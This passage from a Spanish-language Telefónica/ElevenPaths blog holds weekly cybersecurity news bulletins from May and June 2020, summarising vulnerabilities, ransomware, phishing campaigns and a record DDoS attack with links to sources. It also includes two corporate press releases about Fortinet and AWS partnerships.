maliciosa directamente desde el editor web de SharePoint y sería considerada como legítima. Toda la info: https://www.zerodayinitiative.com/blog/2020/6/16/cve-2020-1181-sharepoint-remote-code-execution-through-web-parts AWS Shield mitiga el ataque de DDoS más grande hasta la fecha A raíz del informe AWS Shield Theat Landscape se ha dado a conocer que este servicio de Amazon ha logrado mitigar el mayor ataque DDoS nunca registrado, con un volumen de 2.3 Tbps. Se desconoce el objetivo de este ataque, pero se ha detallado que este incidente se llevó a cabo utilizando servidores web CLDAP (protocolo de acceso a directorios sin conexión) y que se mantuvo durante tres días. Este protocolo se trata de una alternativa a LDAP y se utiliza para conectarse, buscar y modificar directorios compartidos en Internet. Asimismo, está bien documentado que los servidores CLDAP amplifican el tráfico DDoS entre 56 y 70 veces su tamaño inicial, lo que lo convierte en un protocolo muy solicitado para proporcionar soporte a los servicios DDoS que se ponen a disposición en el mercado para agentes amenaza. Cabe destacar que el anterior registro para el ataque DDoS de mayor volumen se detectó el mes de marzo del año 2018, con un total de 1.7 Tbps. Más información: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/116850_2020-Q1_AWS_Shield_TLR.pdf Vulnerabilidad en Pulse Secure Client Investigadores de Red Timmy Security han descubierto una vulnerabilidad de elevación de privilegios en el cliente de Pulse Secure para sistemas Windows. La explotación de este fallo permitiría a un actor amenaza abusar de PulseSecureService.exe para que ejecute un archivo arbitrario de Microsoft Installer (.msi) con privilegios de SYSTEM, otorgándole permisos de administrador. La vulnerabilidad se encuentra en el componente dsInstallerService, el cual otorga a usuarios sin privilegios de administrador la posibilidad de instalar nuevos componentes o actualizarlos utilizando los instaladores proporcionados por Pulse Secure. Este fallo ha sido probado con éxito en versiones anteriores a la 9.1.6. Todos los detalles: https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
19 de junio de 2020
ElevenPaths de Telefónica amplía su colaboración con Fortinet para mejorar la seguridad del sector industrial
ElevenPaths y Fortinet se asocian para mejorar la ciberseguridad en infraestructura y procesos industriales mediante la entrega de soluciones integrales de OT, IT e IoT a sus clientes. ElevenPaths, la compañía de ciberseguridad parte de Telefónica Tech, y Fortinet, líder global en soluciones de ciberseguridad amplias, integradas y automatizadas, anunciaron hoy la ampliación de su marco de colaboración con el objetivo de ofrecer nuevos servicios gestionados de seguridad para clientes del sector industrial que les proporcionarán seguridad avanzada para sus entornos de tecnologías de operación de infraestructuras y procesos industriales (OT), tecnología de la información (IT) e Internet de las Cosas (IoT) de forma integral. La ampliación del acuerdo permite a ElevenPaths aprovechar las soluciones del Fortinet Security Fabric para sistemas de controles industriales con el fin de satisfacer la creciente demanda de las organizaciones de servicios de seguridad administrados para garantizar que los entornos OT y IT estén protegidos y en cumplimiento. ElevenPaths ofrecerá a sus clientes las soluciones de seguridad OT de Fortinet con la mejor protección contra amenazas para entornos de TI corporativos que se extienden desde el centro de datos hasta la nube y el perímetro de la red, las cuales se apoyarán en el alcance global y la amplia experiencia de los profesionales de la seguridad de Telefónica para brindar el mejor servicio a los diversos sectores Industriales. “Una gran parte de nuestros clientes se encuentra en una fase del proceso de transformación digital en el que las tecnologías OT e IoT tienen un papel protagonista. Aunque sus beneficios son indudables, también suponen una mayor exposición a riesgos de seguridad que deben ser convenientemente gestionados. La tecnología de Fortinet es una parte integral de nuestra propuesta de valor y de nuestra estrategia de ciberseguridad para garantizar que abordemos los nuevos y crecientes riesgos de seguridad de nuestros clientes”, señaló Alberto Sempere, director de producto y comercialización de ElevenPaths. Fortinet tiene el conjunto más completo de soluciones para la protección de entornos industriales en el mercado de ciberseguridad. Como líder establecido en seguridad y protección de OT, Fortinet puede abordar una amplia gama de desafíos de entornos de IT y OT aislados, brindando protección instantánea de vulnerabilidades y acceso remoto seguro, abordando así los desafíos de ciberseguridad y confiabilidad que enfrentan las Industrias. “Fortinet y ElevenPaths trabajan juntos desde hace unos años para ayudar a nuestros clientes a asegurar sus innovaciones digitales en rápida evolución. Estamos encantados de ampliar aún más nuestra colaboración para combinar los servicios de seguridad de ElevenPaths con las capacidades amplias, integradas y automatizadas del Security Fabric de Fortinet para proporcionar seguridad avanzada a redes OT e infraestructuras críticas", dijo John Maddison, vicepresidente ejecutivo de Productos y CMO de Fortinet. ElevenPaths se posiciona como líder en ciberseguridad para entornos industriales, aportando el conocimiento de sus equipos multidisciplinares de expertos, la capacidad de sus MSSPs (Managed Security Service Provider) inteligentes a través de los que ofrece servicios gestionados globales, así como la experiencia como operador crítico de comunicaciones y la experiencia como empresa de servicios de seguridad física para brindar una propuesta de seguridad digital diferenciadora a sus clientes en todo el mundo. "El desafío de la digitalización en el sector industrial es hoy una realidad en los mercados de América Latina. A pesar de ser un sector más resistente a los cambios y que evoluciona a un ritmo tecnológico más lento, las palabras ahorro, optimización, aceleración y mejora empiezan a estar entre las principales preocupaciones de los líderes de OT y TI. Contar con un socio con la capacidad de llegada al mercado como ElevenPaths es clave para apoyar a los sectores industriales a minimizar los riesgos de ciberseguridad con las soluciones de Fortinet, permitiendo aprovechar la visibilidad y valor agregado que aportan las nuevas tecnologías para normalizar, monitorear y optimizar procesos productivos en tiempo real, haciéndolos más seguros, simples, eficientes y rentables", comentó Joao Horta, vicepresidente de Ventas a Proveedores de Servicios de Fortinet para América Latina y Caribe. Fortinet y ElevenPaths trabajan juntos desde hace varios años y, en junio de 2016 reforzaron su colaboración incorporando la arquitectura del Security Fabric de Fortinet a los servicios de seguridad gestionada de ElevenPaths, sumando ahora sus soluciones IT, OT e IoT. ElevenPaths es a su vez Socio MSSP Expert y Aliado Tecnológico de Fortinet, trabajando juntos en Europa y Latinoamérica para reforzar la seguridad de los clientes de ambas compañías. ElevenPaths también es un socio de la alianza de tecnología Fabric-Ready en el Open Fabric Ecosystem de Fortinet. El Fortinet Open Fabric Ecosystem es uno de los más grandes en la industria de la ciberseguridad con más de 360 integraciones de tecnología, y extiende los beneficios del Security Fabric a clientes mutuos al permitir lograr una seguridad avanzada e integral en toda su infraestructura. La ciberseguridad es uno de los servicios digitales que ofrece Telefónica que ha sido recientemente integrado, junto a los de cloud e IoT/Big Data, en Telefónica Tech, una nueva unidad que aglutina estos tres negocios con alto potencial de crecimiento y con los que quiere acompañar a sus clientes en su transformación digital. Nota de prensa completa
16 de junio de 2020
Noticias de Ciberseguridad: Boletín semanal 6-12 de junio
Compromiso de Enel y Honda con el ransomware Snake La corporación energética italiana Enel y el gigante japonés de la automoción Honda se habrían visto afectados el pasado fin de semana por sendos ataques de ransomware que habrían impactado en sus sistemas IT. El responsable de los compromisos es el ransomware Snake (también denominado Ekans) según indican los análisis realizados por el investigador independiente @milk3am en base a las dos muestras del malware subidas a la plataforma VirusTotal. La investigación sobre el vector de entrada no es concluyente, pero es probable que se debiese a la exposición pública de servicios de acceso remoto (RDP) en ambas compañías, tal y como señalaban otras fuentes. Por parte de Enel, solo su filial argentina, Edesur, ha admitido estar sufriendo un fallo informático que está "dificultando la atención a clientes por teléfono, redes sociales y el uso de la Oficina Virtual”. Honda, por su parte, ha reconocido al medio BleepingComputer estar experimentando problemas en su red informática, recalcando que la producción continúa sin contratiempos y que el impacto en sus clientes es nulo. Los investigadores estiman que las redes afectadas incluirían tanto Europa como Japón. Snake es un ransomware surgido a finales de 2019 que cuenta entre sus módulos con capacidades específicas para terminar procesos asociados a software ICS/SCADA. El pasado mes se conoció una importante campaña de distribución que afectó, al menos, a otra gran corporación en el sector de la salud, la alemana Fresenius. Más información: https://twitter.com/milkr3am/status/1269932348860030979 Nueva campaña de suplantación de la ITSS En las últimas horas se ha detectado una nueva campaña fraudulenta que intenta suplantar a la Inspección de Trabajo y Seguridad Social. En esta ocasión, los correos electrónicos provienen de los remitentes @itss.se, @itss.com, @itss.es y @itss.app, teniendo como asunto del mensaje “Denuncia Oficial XXXXXX, se inició una investigación contra su empresa”. En estos informan de una supuesta investigación contra la empresa por posibles incumplimientos, y hacen alusión a que las denuncias se encuentran adjuntas en el documento Excel que se incluye en el email. En caso de que una víctima abra este documento malicioso y habilite su ejecución, será infectado con un malware de la familia Smoke-Loader, con funcionalidades de robo de contraseñas Todos los detalles: https://s2grupo.es/es/campana-de-phishing-inspeccion-de-trabajo-seguridad-social/ Boletín de SAP de junio SAP ha publicado su boletín de actualizaciones para junio de 2020 con dos vulnerabilidades críticas, cuatro de nivel alto y 12 de nivel medio. Destacan especialmente: CVE-2020-1938: Valorada con CVSSv3 de 9,8, se trata de una vulnerabilidad en el motor de JSP y servlets de Tomcat que explota la confianza Tomcat a la hora de manejar peticiones http desde el conector AJP, lo que puede aprovecharse para conseguir acceso ficheros arbitrarios de cualquier parte del servicio web y procesarlos como JSP, desembocando en la ejecución remota de código. CVE-2020-6265: Valorada con CVSSv3 de 9,8, se trata de una vulnerabilidad por claves por defecto (credenciales embebidas) en SAP Commerce y SAP Commerce Datahub que permiten evadir el control de accesos si se conocen las credenciales por defecto. Para ambas vulnerabilidades la exposición es máxima, ya que carecen de complejidad, se pueden explotar sin requisitos previos ni necesidad de interacción y tienen un máximo impacto sobre la tríada CIA. Más info: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=547426775 Nuevas vulnerabilidades en el protocolo SMB En las últimas horas se han producido dos publicaciones relevantes que afectan a vulnerabilidades en el protocolo SMB: En primer lugar, los analistas de ZecOps han descubierto una nueva vulnerabilidad, SMBleed, CVE-2020-1206. Se trata de un fallo que permite extraer datos de la memoria del kernel de forma remota y que, si se usa en conjunción con SMBGhost, puede provocar la ejecución remota de código de forma previa a la autenticación. Este fallo afecta sólo a versiones muy recientes de Windows y queda neutralizada por las mismas mitigaciones puestas en práctica para parchear SMBGhost. Por otro lado, se ha detectado una vulnerabilidad de ejecución remota de código (CVE-2020-1301) que aprovecha un fallo del protocolo SMBv1, cuyo uso está desaconsejado por Microsoft. Un atacante autenticado con credenciales para poder acceder a una carpeta de red remota podría ejecutar código de su elección. Los descubridores de la vulnerabilidad señalan como factor mitigante que el share debe ser una unidad de disco completa. Asimismo, se ha especulado que podría existir otra vía de explotación que no exija autenticación previa. Este fallo afecta a todas las versiones de Windows y sus parches han sido incluidos en el boletín de actualizaciones de Microsoft del mes de junio. Para saber más: https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/ eCh0raix: Ransomware contra dispositivos QNAP NAS Desde el medio Bleeping Computer alertan de la reanudación en la actividad de los operadores del ransomware eCh0raix contra dispositivos de almacenamiento conectados a la red QNAP. La actividad del grupo comenzaba el pasado mes de junio de 2019 y se veía reducida en los últimos meses con motivo de la competencia con otros grupos como Muhstik y QSnatch, que también tenían como objetivo dispositivos QNAP NAS. Sin embargo, y posiblemente a raíz de una publicación donde se detallaban tres vulnerabilidades críticas en estos dispositivos, se ha detectado un incremento de usuarios que se han visto afectados por un ransomware que finalmente se ha atribuido a eCh0raix. Tradicionalmente el grupo centra sus ataques en la explotación de vulnerabilidades antiguas no parcheadas o en la realización de ataques de fuerza bruta para adivinar contraseñas débiles. Es posible que se hayan incorporado exploits para las nuevas vulnerabilidades, lo que explicaría el repunte en la actividad del grupo, de forma que se recomienda a los usuarios actualizar sus dispositivos lo antes posible. Más información: https://www.bleepingcomputer.com/news/security/ongoing-ech0raix-ransomware-campaign-targets-qnap-nas-devices/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
12 de junio de 2020
Noticias de Ciberseguridad: Boletín semanal 30 de mayo-5 de junio
Brecha de seguridad en 8Belts Investigadores de vpnMentor descubrieron a mediados de abril una brecha de datos en la plataforma de aprendizaje de idiomas 8Belts debido a una configuración incorrecta en un bucket S3 de Amazon Web Services. Esta brecha ha dejado expuestos los datos de más de 150.000 usuarios particulares y corporativos de todo el mundo. Entre estos datos, siendo los más antiguos del 2017, hay información privada como nombres, direcciones de email, números de teléfono, fechas de nacimiento, DNIs, país de residencia y nombres de usuario de Skype. Además, los registros también contenían información técnica de 8Belts que podría ser aprovechada por agentes amenaza para conseguir aún más acceso a la plataforma. En su web, 8Belts afirma tener como clientes a varias grandes multinacionales de sectores como la automoción, la banca, el retail o el deporte, algunas de ellas con sede en España. Más: https://es.vpnmentor.com/blog/report-8belts-leak/ Revocación de certificado raíz de Sectigo/Cómodo El pasado día 30 se revocó la validez del certificado raíz “AddTrust External CA Root” emitido por parte de Comodo CA (ahora Sectigo) y que llevaba en funcionamiento desde el año 2000. La medida afectó principalmente al acceso a servicios, sitios webs y APIs a través de sistemas legado como pueden ser Windows XP e Internet Explorer 6, ya que estos sistemas no reconocen certificados más recientes como“COMODO RSA CA” & “USERTrust RSA CA”. Pese a ello, durante el fin de semana varias entidades como Namecheap o Proximus indicaron estar teniendo problemas derivados del incidente. La confusión vino originada, en parte, porque parece que la empresa no advirtió individualmente a sus usuarios de la revocación, aunque sí emitió un comunicado a través de su web. Los usuarios que intentasen conectarse a las webs afectadas se encontrarían con problemas para establecer conexiones seguras, pudiendo ser imposible la prestación del servicio. Todos los detalles: https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020 Publicación de exploit RCE para la vulnerabilidad SMBGhost Se ha publicado una prueba de concepto para aprovechar el fallo crítico (CVE-2020-0796 con CVSS 10.0) en el protocolo SMBv3 de Microsoft. Si bien ya se habían publicado PoCs para realizar ataques de denegación de servicio y de escalada de privilegios aprovechando esta vulnerabilidad, este nuevo exploit permitiría la ejecución remota de código en sistemas vulnerables. Se espera que en los próximos días otros investigadores publiquen una versión depurada de este exploit. Más información: https://github.com/chompie1337/SMBGhost_RCE_PoC Detalles sobre vulnerabilidades en SAP Adaptive Server Enterprise El equipo de investigadores de Trustwave ha publicado los detalles de 6 vulnerabilidades en SAP Adaptive Server Enterprise. El primer fallo crítico (CVE-2020-6248) es un error de ejecución arbitraria de código que permitiría corromper el archivo de configuración de la copia de seguridad del servidor. El segundo (CVE-2020-6252) es un fallo de divulgación de información que afecta al componente Cockpit en instalaciones por defecto de SAP ASE en Windows. La tercera vulnerabilidad (CVE-2020-6241), de criticidad alta, se trata de una inyección SQL en la rutina de manejo de tablas globales temporales, lo que permitiría a usuarios estándar conectarse al servidor y elevar sus privilegios a administrador. La cuarta (CVE-2020-6243), con CVSS de 8.0, permitiría la ejecución de código arbitrario. La quinta (CVE-2020-6253), también de criticidad alta, es una vulnerabilidad de escalada de privilegios a través de inyección SQL en WebServices. La última (CVE-2020-6250), de criticidad media, es un fallo en el que las contraseñas estarían expuestas en texto plano en los registros de instalación. Estas vulnerabilidades ya fueron corregidas por la compañía a mediados del mes de mayo. Saber más: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/system-takeover-through-new-sap-ase-vulnerabilities/ Nueva versión del troyano bancario Metamorfo Investigadores de seguridad de Bitdefender han publicado un análisis sobre una nueva campaña maliciosa llevada a cabo por el troyano bancario Metamorfo. Este software malicioso está dirigido principalmente a usuarios brasileños y su vector de entrada principal es a través de documentos de office que contienen macros maliciosas y son transmitidos mediante correos electrónicos en campañas de phishing. En esta ocasión, se informa que se estaría empleando la técnica de secuestro de DLL, utilizado para ocultar su presencia en el sistema infectado y poder elevar privilegios. Asimismo, la metodología empleada en estas casuísticas es forzar a una aplicación legítima a ejecutar código de terceros mediante el intercambio de una cadena de código por una maliciosa. De esta manera los agentes amenaza sustituyen la DLL legítima con una DLL que contiene el código malicioso, por lo que la aplicación carga y ejecuta dicho código. En esta nueva campaña, se ha utilizado software legítimo como Avira, AVG, Avast, Daemon Tools, Steam y NVIDIA. De esta manera si alguno de estos productos solicita privilegios más elevados, la víctima no sospechará en permitirlo al considerarlos legítimos. Sin embargo, al haber sido modificado sus DLL será utilizado para robar credenciales bancarias de la víctima u otro tipo de datos. Toda la info: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/115735_Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
5 de junio de 2020
ElevenPaths logra el estatus de Competencia en Seguridad de Amazon Web Services
La compañía de ciberseguridad de Telefónica Tech ha demostrado una gran experiencia tanto técnica como de consultoría a la hora de ayudar a los clientes a adoptar, desarrollar y desplegar proyectos complejos de seguridad que permiten proteger sus entornos en AWS para establecer y mantener una adecuada postura de seguridad en la nube. ElevenPaths, la compañía de ciberseguridad parte de Telefónica Tech, ha logrado el estatus de Competencia en Seguridad de Amazon Web Services (AWS). Este reconocimiento demuestra que ElevenPaths posee una gran experiencia ayudando a los clientes a alcanzar sus objetivos de seguridad en la nube, alineados con las mejores prácticas y guías de seguridad de AWS combinadas con la experiencia de ElevenPaths en el diseño de plataformas de seguridad y procesos para la adecuada gestión de la seguridad en la nube. AWS brinda soluciones escalables, flexibles y rentables dirigidas tanto a startups como a empresas globales. Para apoyar la integración y el despliegue continuo de estas soluciones, AWS estableció el Programa de competencias de AWS con vistas a ayudar a los clientes a identificar a los socios consultores y tecnológicos de la Red de Socios de AWS (APN Network) con gran experiencia y pericia en la industria. Los Socios de Competencia en Seguridad de AWS han demostrado tener éxito a la hora de crear productos y soluciones en AWS para respaldar a los clientes en múltiples áreas, entre las que se incluyen: seguridad de la infraestructura, gestión de políticas, gestión de la identidad, supervisión de la seguridad, gestión de vulnerabilidades y protección de datos. Lograr la competencia en seguridad como socio de consultoría AWS especializado en ingeniería de seguridad, distingue a ElevenPaths como miembro de la red AWS APN brindando servicios de consultoría especializados para ayudar a las empresas a adoptar, desarrollar y desplegar proyectos complejos de seguridad que permiten proteger sus entornos en AWS para establecer y mantener una adecuada postura de seguridad en la nube en AWS. Además, Telefónica Tech, mantiene una colaboración estratégica con Amazon Web Services para hacer más fácil la transición a la nube a los clientes corporativos. Telefónica incluye AWS en su oferta de servicios en la nube para el mercado B2B, y cuenta con un equipo de especialistas formados y certificados en AWS. Asimismo, ha creado un Centro de Excelencia Cloud en España y Brasil que brinda servicios profesionales de asesoramiento y ayuda a los clientes a la hora de integrar los servicios en la nube pública, y se pondrá en marcha también en el resto de los países que conforman la región que abarca Telefónica Hispam. En el último año, decenas de profesionales de Telefónica se ha formado y especializado en España, Brasil y varios países de Hispam en las tecnologías en la nube de AWS. “Estamos muy orgullosos de este reconocimiento de AWS. Demuestra que vamos en la dirección correcta y nos anima a seguir trabajando para continuar ayudando a nuestros clientes a mejorar su seguridad en la nube y reducir por tanto su riesgo en el proceso de transformación digital", declaró Alberto Sempere, director de producto y comercialización de ElevenPaths. "Nuestros expertos en seguridad en la nube están perfectamente capacitados para diseñar, desplegar y gestionar las innovadoras características de seguridad nativas de la nube de AWS, y ayudar a nuestros clientes a ir trasladando las cargas de trabajo a la nube de forma segura y respetando siempre el cumplimiento normativo.” ElevenPaths ofrece un enfoque integral extremo a extremo de seguridad en la nube que le permite guiar y acompañar a sus clientes en todo el proceso de adopción segura de la nube. Con la ambición clara de ser el proveedor de servicios de seguridad en la nube de referencia en sus mercados, ha desarrollado durante los últimos dos años una propuesta de valor completa transformando internamente su tecnología, procesos y personas con la formación y certificación de profesionales de ciberseguridad en arquitecturas de AWS y especialización de expertos certificados en seguridad de AWS en España y Brasil. Esta propuesta permite dar la mejor respuesta a los nuevos retos derivados del cambio de paradigma de la adopción de la nube, incluye Servicios Profesionales de Seguridad en la nube para ayudar a los clientes en el diseño de un entorno seguro de AWS, siguiendo las mejores prácticas de seguridad para la arquitectura de AWS y el diseño de la plataforma de seguridad en la nube que mejor se adapte a sus necesidades, combinando los servicios nativos de AWS y tecnología avanzada de fabricantes de seguridad. Asimismo, la propuesta incluye el Servicio de Seguridad Gestionada para la nube (Cloud MSS) de ElevenPaths, que gestiona la seguridad de los entornos AWS de los clientes desde su SOC, proporcionando una visibilidad completa de los activos de la nube, seguridad de la red y su postura de seguridad, identificando también los riesgos inherentes y detectando los ciberataques e incidentes de seguridad, para lo cual tiene en cuenta los requisitos en materia de cumplimiento, así como las normas de gobernanza de los clientes. Como Socio Consultor de seguridad de AWS, ElevenPaths está bien cualificado y certificado para guiar, con sus profesionales de ciberseguridad certificados como especialistas de seguridad en AWS, a los clientes a través de todas las fases del desarrollo de proyectos de seguridad. Estas fases incluyen el diseño, despliegue e integración de servicios nativos de AWS, así como el mantenimiento de la infraestructura de AWS, los activos de los clientes, las aplicaciones y las herramientas utilizadas para protegerlos adecuadamente. Este reconocimiento anima a ElevenPaths a continuar con su estrategia, mejorar y evolucionar constantemente sus capacidades para anticiparse y dar respuesta a los retos presentes y futuros de sus clientes en la adopción segura de AWS. Nota de prensa completa:
26 de mayo de 2020
Noticias de Ciberseguridad: Boletín semanal 9-22 de mayo
NXNSAttack: Nuevo ataque contra protocolo DNS Se ha dado a conocer la existencia de un nuevo ataque de denegación de servicio que aprovecha una vulnerabilidad del protocolo DNS que afecta a todos los DNS recursivos. Se trata de un ataque de tipo subdominio aleatorio que aprovecha las características de delegación de DNS para conseguir un factor de amplificación muy elevado: el atacante podría conseguir generar centenares de paquetes a partir de únicamente dos consultas. Al tratarse de un problema relacionado con la forma en que funciona DNS, no existe un parche como tal para la corrección de la funcionalidad, sino que sólo hay disponibles mitigaciones. Aplicar estas mitigaciones implica establecer una limitación en los resolver para restringir el máximo número de consultas que pueden realizarse tras una consulta de un cliente. Estas mitigaciones dependerán de cada fabricante, dado que la especificación del protocolo DNS no define nada a este respecto. Algunos como Microsoft, BIND o PowerDNS ya han emitido las suyas. Más detalles: http://cyber-security-group.cs.tau.ac.il/ Campañas del malware bancario Mekotio en España Durante las últimas semanas se han producido campañas maliciosas en las que se empleaban troyanos bancarios de origen brasileño como Casbaneiro y Grandoreiro. Una muestra de ello, es la ocurrida a finales del mes de abril en la que se suplantaba a la Agencia Tributaria. Sin embargo, desde el equipo de seguridad ESET, señalan que han detectado una nueva campaña maliciosa en la que se ha vuelvo a suplantar a dicha entidad y a la Dirección General de Tráfico (DGT) mediante la utilización del malware denominado Mekotio. En esta ocasión agentes-amenaza emplean una metodología similar a las anteriores veces utilizadas, a través del envío de un correo que suplanta a la entidad afectada, cuyo objetivo es convencer a la víctima de su legitimidad. Asimismo, se facilita una serie de enlaces fraudulentos en los que se informaa las víctimas de un presunto reembolso, en el caso de la campaña de la Agencia Tributaria, o al pago de una multa en la suplantación a la DGT. Una vez la víctima accede a los dominios fraudulentos se insta a la descarga de un archivo, que en realidad contiene el malware Mekotio. Se recomienda revisar incongruencias lingüísticas, tanto en el cuerpo del correo como en el asunto, al igual que evitar abrir enlaces o archivos que el usuario no haya solicitado. Toda la información: https://blogs.protegerse.com/2020/05/11/nueva-semana-nueva-campana-del-troyano-bancario-mekotio Campaña masiva de distribución de NetSupport Manager Investigadores de Microsoft han alertado de la identificación de una campaña maliciosa masiva que dio comienzo el día 12 de mayo y que tiene por objeto la distribución de la herramienta legítima de administración remota NetSupport Manager a través de malspam relacionado con la crisis del Coronavirus. El vector de entrada lo constituyen correos electrónicos que suplantan a la entidad John Hopkins Center y en cuyo contenido se detallan el número de muertes relacionadas con la pandemia en Estados Unidos. Como archivo adjunto aparece un documento Excel con macros maliciosas que permitirán la descarga del malware. Se han identificado cientos de muestras distintas de estos documentos maliciosos. Una vez lograda la infección, NetSupport instala otra serie de archivos .dll, .ini y .exe, así como VBScripts y PowerShell scripts. Además, NetSupport provee al atacante las capacidades de un troyano de acceso remoto, con control total sobre el dispositivo. Noticia completa: https://www.bleepingcomputer.com/news/security/microsoft-warns-of-massive-phishing-attack-pushing-legit-rat/ Vulnerabilidades en productos de Palo Alto Palo Alto Networks ha publicado recientemente un total de 26 avisos de seguridad para PAN-OS, el software que se ejecuta en sus firewalls: 1 vulnerabilidad crítica, 17 de criticidad alta, 7 de criticidad media y 1 baja. La vulnerabilidad crítica (CVE-2020-2018 CVSS v3 9) es una vulnerabilidad de elusión de autenticación en la función de cambio de contexto de Panorama y permite que un atacante con acceso a la red a la interfaz de administración de Panorama obtenga acceso privilegiado a los firewalls administrados. Se recomienda actualizar a las siguientes versiones: PAN-OS 9.1, versión 9.1.1 o posterior; PAN-OS 9.0, versión 9.0.7 o posterior; o PAN-OS 8.1, versión 8.1.14 o posterior. Por otra parte, PAN-OS 7.1 está en soporte extendido hasta el 30 de junio de 2020, y sólo se tiene en cuenta para las vulnerabilidades críticas de seguridad. Por su parte, PAN-OS 8.0 ha llegado al final de su vida útil y no está cubierto por las pólizas de garantía de seguridad de productos del fabricante. Desde el SOC de Telefónica se viene trabajando en la revisión y parcheado de los equipos afectados. Más en: https://security.paloaltonetworks.com/ Parche de Microsoft para fallo en cliente RDP Investigadores de CheckPoint han informado sobre una vulnerabilidad RDP en Microsoft que no ha sido corregida correctamente. Este fallo, denominado Reverse RDP, permitía que, si el equipo al que se accedía mediante RDP estaba infectado con malware, este pudiera tomar el control de las actividades de los usuarios que accedían a él. Microsoft utilizó la función PathCchCanonicalize para corregir este error, pero esta también contenía fallos que permitían reproducir esta vulnerabilidad y realizar ataques de Path Traversal, por lo que Microsoft lanzó un nuevo parche en febrero. No obstante, la vulnerabilidad en la API oficial de Microsoft todavía no ha sido solucionada, de forma que todas las aplicaciones desarrolladas de acuerdo con la guía de mejores prácticas de Microsoft seguirán siendo vulnerables a ataques de Path Traversal. Más información: https://research.checkpoint.com/2020/reverse-rdp-the-path-not-taken/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
22 de mayo de 2020
Noticias de Ciberseguridad: Boletín semanal 25 de abril-8 de mayo
BazarBackdoor – Nueva puerta trasera de los desarrolladores de TrickBot El investigador Vitali Kremez ha publicado los detalles de una nueva puerta trasera que se vendría distribuyendo en las últimas semanas a través de distintas campañas de phishing con el objetivo de comprometer y ganar acceso total a redes corporativas. Las similitudes entre TrickBot y esta nueva puerta trasera, BazarBackdoor, ha permitido a los investigadores atribuirla al mismo grupo de atacantes. El vector de entrada son campañas de phishing de distintas temáticas, enviadas a través de la plataforma de marketing online Sendgrid, y que contienen enlaces a documentos alojados en Google Docs. Cuando se hace clic en el enlace para descargar los documentos, se descarga realmente un ejecutable con el mismo nombre e icono que el supuesto documento, que conecta con los servidores Command & Control para descargar la puerta trasera, que finalmente se instala en el equipo sin el conocimiento del usuario. BazarBackdoor descarga y ejecuta herramientas como Cobalt Strike, de forma que se evidencia la intención de los atacantes de ganar acceso a redes corporativas que se puedan infectar con ransomware, donde se pueda obtener información sensible o cuyo acceso puedan posteriormente vender a otros actores amenaza. Más información: https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/ Malware Asnarök responsable de explotación de vulnerabilidad en Firewall Sophos Investigadores de seguridad de Sophos han publicado los detalles de un ataque contra los propios firewall de la firma con un malware denominado Asnarök, que tuvo lugar el pasado 22 de abril y cuyo objetivo principal era el robo de información de los cortafuegos de la empresa: número de serie del cortafuegos comprometido, listado de direcciones de correo almacenadas en el dispositivo, usuarios y contraseñas (cifradas) almacenadas en el cortafuegos, incluyendo la contraseña de administrador y listado de usuarios habilitados para SSL VPN. El vector de entrada del malware era la explotación de la vulnerabilidad 0-Day CVE-2020-12271 de inyección SQL reportada el día antes. Desde Sophos bloquearon los dominios empleados por Asnarök los días 22 y 23 de abril, mitigaron la afectación sobre los dispositivos afectados los días 23 y 24 de abril tras identificar el vector inicial de ataque y, finalmente, el día 25 de abril hacían pública la actualización de seguridad para la vulnerabilidad así como desplegaban el parche para todas las unidades que cuentan con las actualizaciones automáticas. Todos aquellos que no tengan las actualizaciones automáticas, deben seguir las instrucciones para instalar el hotfix de forma manual. Todos los detalles: https://news.sophos.com/en-us/2020/04/26/asnarok/ Campaña de suplantación de Microsoft Teams Abnormal Security ha informado de una reciente campaña de suplantación por correo electrónico contra Microsoft Teams. Según informan, los atacantes estarían buscando obtener las credenciales de acceso de empleados de esta herramienta, al haberse incrementado su uso debido al aumento del teletrabajo. Los correos electrónicos enviados se hacen pasar por notificaciones automáticas del equipo de Microsoft, e incitan a las víctimas a acceder al enlace de acceso de inicio de sesión. De acuerdo con los investigadores, este ataque estaría siendo efectivo debido a que tanto el correo electrónico como la página de destino son convincentes, además de ser frecuentes las notificaciones recibidas por los usuarios de este software. Cabe destacar que una intrusión en la cuenta de Microsoft Teams atañe un mayor peligro al estar vinculada a Microsoft Office 365, por lo que un atacante podría tener acceso a una mayor información disponible. Toda la info: https://abnormalsecurity.com/blog/abnormal-attack-stories-microsoft-teams-impersonation/ Vulnerabilidades críticas en Citrix ShareFile storage zones controller Citrix ha corregido tres vulnerabilidades de severidad crítica (CVE-2020-7473, CVE-2020-8982 y CVE-2020-8983) en ShareFile storage zones controller. Estas vulnerabilidades, si son explotadas con éxito, podrían permitir a un ataque no autenticado vulnerar los controladores de zonas de almacenamiento, pudiendo así acceder a los documentos y carpetas del usuario víctima en ShareFile. Según ha comunicado 